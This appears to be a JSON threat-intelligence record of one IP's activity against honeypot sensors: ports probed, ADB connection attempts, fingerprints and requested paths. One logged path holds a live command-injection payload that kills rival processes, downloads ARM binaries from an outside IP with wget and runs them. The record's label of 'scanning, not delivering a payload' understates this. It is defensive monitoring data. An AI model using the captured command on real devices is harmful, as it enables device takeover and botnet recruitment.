{"ip":"176.65.139.173","total_events":172,"verdict":{"verdict":"scanning","label":"Scanning for known vulnerabilities","detail":"1 exploit-path probe(s)","confidence":"medium","network_type":"network services","why":["1 request(s) matched a known exploit path.","Only GET/HEAD seen, no request body: scanning for the vulnerability, not delivering a payload.","Not in any known-scanner range."]},"first_seen":"2026-05-01T13:14:06","last_seen":"2026-06-07T07:40:18","events_24h":0,"events_7d":0,"geo":{"country_code":"DE","country_name":"Germany","region":"","city":"","lat":51.2993,"lon":9.491,"asn":51396,"org":"Pfcloud UG (haftungsbeschrankt)"},"source_domain":null,"known_scanners":[],"scanner_tag":null,"cve_matches":[],"malware":[],"top_ports":[{"port":22222,"proto":"tcp","label":"","count":42},{"port":2222,"proto":"tcp","label":"SSH-alt","count":23},{"port":2022,"proto":"tcp","label":"","count":19},{"port":5555,"proto":"tcp","label":"","count":12},{"port":5556,"proto":"tcp","label":"","count":8},{"port":5558,"proto":"tcp","label":"","count":6},{"port":5559,"proto":"tcp","label":"","count":6},{"port":22,"proto":"tcp","label":"SSH","count":6},{"port":5501,"proto":"tcp","label":"","count":5},{"port":5500,"proto":"tcp","label":"","count":5},{"port":5557,"proto":"tcp","label":"","count":4},{"port":5560,"proto":"tcp","label":"","count":3},{"port":5554,"proto":"tcp","label":"","count":3},{"port":4444,"proto":"tcp","label":"","count":3},{"port":5552,"proto":"tcp","label":"","count":3}],"fingerprints":{"ssh_hassh":["16443846184eafde36765c9bab2f4397"],"tls_ja4":[],"tls_ja3":[],"ja4h":["ge11nn07en_f8f3b1e8e10e","ge11nn0100_4740ae6347b0"]},"fingerprint_peers":{"ge11nn0100_4740ae6347b0":720,"ge11nn07en_f8f3b1e8e10e":13,"16443846184eafde36765c9bab2f4397":189},"user_agents":["KrebsOnSecurity"],"timeline":[{"date":"2026-05-01","count":6},{"date":"2026-05-14","count":3},{"date":"2026-05-15","count":9},{"date":"2026-05-16","count":2},{"date":"2026-05-17","count":1},{"date":"2026-06-04","count":12},{"date":"2026-06-05","count":115},{"date":"2026-06-06","count":21},{"date":"2026-06-07","count":3}],"recent_events":[{"timestamp":"2026-06-07T07:40:18","port":5556,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"CNXN\u0000\u0000\u0000\u0001\u0000\u0010\u0000\u0000\u0007\u0000\u0000\u00002\u0002\u0000\u0000����host::\u0000","payload_hex":"434e584e00000001001000000700000032020000bcb1a7b1686f73743a3a00","method":"","user_agent":"","community_id":"1:7QUD6+bYqR+c+1ras6SFk7K5/DQ=","ja3":"","session":"abbfe25b-3fdd-4b82-abd0-ccf58a5170f1","seq":1,"duration_ms":100,"bytes_in":31,"bytes_out":14,"enriched":{"digest":"6c0944affd4f5212","strings":["CNXN","host::"]}},{"timestamp":"2026-06-07T07:37:01","port":5556,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"CNXN\u0000\u0000\u0000\u0001\u0000\u0010\u0000\u0000\u0007\u0000\u0000\u00002\u0002\u0000\u0000����host::\u0000","payload_hex":"434e584e00000001001000000700000032020000bcb1a7b1686f73743a3a00","method":"","user_agent":"","community_id":"1:sl+In6hG3n75Ny/LFxr6ks7bP3Y=","ja3":"","session":"8e66f570-528e-4ace-a266-7c89c6f06b28","seq":1,"duration_ms":100,"bytes_in":31,"bytes_out":14,"enriched":{"digest":"6c0944affd4f5212","strings":["CNXN","host::"]}},{"timestamp":"2026-06-07T06:27:57","port":5555,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"CNXN\u0000\u0000\u0000\u0001\u0000\u0010\u0000\u0000\u0007\u0000\u0000\u00002\u0002\u0000\u0000����host::\u0000","payload_hex":"434e584e00000001001000000700000032020000bcb1a7b1686f73743a3a00","method":"","user_agent":"","community_id":"1:CikJ9bU9ZCwSjf1XJ8yayptPCig=","ja3":"","session":"f94871d5-4717-41be-ad1d-680b9f9c5583","seq":1,"duration_ms":101,"bytes_in":31,"bytes_out":14,"enriched":{"digest":"6c0944affd4f5212","strings":["CNXN","host::"]}},{"timestamp":"2026-06-06T11:56:43","port":555,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"CNXN\u0000\u0000\u0000\u0001\u0000\u0010\u0000\u0000\u0007\u0000\u0000\u00002\u0002\u0000\u0000����host::\u0000","payload_hex":"434e584e00000001001000000700000032020000bcb1a7b1686f73743a3a00","method":"","user_agent":"","community_id":"1:U8aPqRaktLajoKy6bRR4+Z9fVtA=","ja3":"","session":"eb25ac90-d327-46fd-bbb6-930691c75bd5","seq":1,"duration_ms":101,"bytes_in":31,"bytes_out":14,"enriched":{"digest":"6c0944affd4f5212","strings":["CNXN","host::"]}},{"timestamp":"2026-06-06T11:00:39","port":5555,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"CNXN\u0000\u0000\u0000\u0001\u0000\u0010\u0000\u0000\u0007\u0000\u0000\u00002\u0002\u0000\u0000����host::\u0000","payload_hex":"434e584e00000001001000000700000032020000bcb1a7b1686f73743a3a00","method":"","user_agent":"","community_id":"1:m6ue77mFCILuzVXvnlH6l+Mv0oo=","ja3":"","session":"b80a0c3b-fe6b-4d94-8dc4-e163cf16f02c","seq":1,"duration_ms":100,"bytes_in":31,"bytes_out":14,"enriched":{"digest":"6c0944affd4f5212","strings":["CNXN","host::"]}},{"timestamp":"2026-06-06T10:55:16","port":5555,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"CNXN\u0000\u0000\u0000\u0001\u0000\u0010\u0000\u0000\u0007\u0000\u0000\u00002\u0002\u0000\u0000����host::\u0000","payload_hex":"434e584e00000001001000000700000032020000bcb1a7b1686f73743a3a00","method":"","user_agent":"","community_id":"1:bdoGP0sitWk8diqQLKXexpetNNo=","ja3":"","session":"c952312a-9c84-49b8-9cd5-2a682eacbb17","seq":1,"duration_ms":100,"bytes_in":31,"bytes_out":14,"enriched":{"digest":"6c0944affd4f5212","strings":["CNXN","host::"]}},{"timestamp":"2026-06-06T10:09:59","port":6661,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"CNXN\u0000\u0000\u0000\u0001\u0000\u0010\u0000\u0000\u0007\u0000\u0000\u00002\u0002\u0000\u0000����host::\u0000","payload_hex":"434e584e00000001001000000700000032020000bcb1a7b1686f73743a3a00","method":"","user_agent":"","community_id":"1:hRPPQdoe5qwMSmPfjgML9xFxL2M=","ja3":"","session":"0eafb9fa-f34f-4c69-9c4b-42283fb31866","seq":1,"duration_ms":100,"bytes_in":31,"bytes_out":14,"enriched":{"digest":"6c0944affd4f5212","strings":["CNXN","host::"]}},{"timestamp":"2026-06-06T01:51:00","port":5560,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"CNXN\u0000\u0000\u0000\u0001\u0000\u0010\u0000\u0000\u0007\u0000\u0000\u00002\u0002\u0000\u0000����host::\u0000","payload_hex":"434e584e00000001001000000700000032020000bcb1a7b1686f73743a3a00","method":"","user_agent":"","community_id":"1:WVXmlzydOX8kcyUxjYTFunVeZrc=","ja3":"","session":"97507471-16d6-4912-852d-35b78c41de8e","seq":1,"duration_ms":101,"bytes_in":31,"bytes_out":14,"enriched":{"digest":"6c0944affd4f5212","strings":["CNXN","host::"]}},{"timestamp":"2026-06-06T01:49:56","port":5560,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"CNXN\u0000\u0000\u0000\u0001\u0000\u0010\u0000\u0000\u0007\u0000\u0000\u00002\u0002\u0000\u0000����host::\u0000","payload_hex":"434e584e00000001001000000700000032020000bcb1a7b1686f73743a3a00","method":"","user_agent":"","community_id":"1:A/yLCMUGF9xKkP9kIAkvhV9anak=","ja3":"","session":"25a2d7e7-5b94-41cf-931e-41db340d573c","seq":1,"duration_ms":100,"bytes_in":31,"bytes_out":14,"enriched":{"digest":"6c0944affd4f5212","strings":["CNXN","host::"]}},{"timestamp":"2026-06-06T01:41:16","port":5560,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"CNXN\u0000\u0000\u0000\u0001\u0000\u0010\u0000\u0000\u0007\u0000\u0000\u00002\u0002\u0000\u0000����host::\u0000","payload_hex":"434e584e00000001001000000700000032020000bcb1a7b1686f73743a3a00","method":"","user_agent":"","community_id":"1:6DST3ElSfBYXL3Fu8oH2iFulFek=","ja3":"","session":"d2984bd5-ae34-42f3-b75e-8296e50286be","seq":1,"duration_ms":100,"bytes_in":31,"bytes_out":14,"enriched":{"digest":"6c0944affd4f5212","strings":["CNXN","host::"]}}],"http_methods":[{"method":"GET","count":15}],"distinct_ports_total":27,"top_paths":[{"path":"/shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+arm4+arm7;wget+http:/\\/103.153.68.104/arm7;chmod+777+arm7;./arm7+cursinqload;wget+http:/\\/103.153.68.104/arm4;chmod+777+arm4;./arm4+jcursinqload","count":13,"ports":3},{"path":"/cgi-bin/luci/;stok=/locale","count":2,"ports":2}],"distinct_paths_total":2,"top_snis":[],"top_hosts":[],"top_alpns":[],"banners":[{"value":"SSH-2.0-Go","count":75}],"credentials":[],"header_profile":null,"tags":[],"data_as_of":"2026-07-03T21:15:40.779008+00:00"}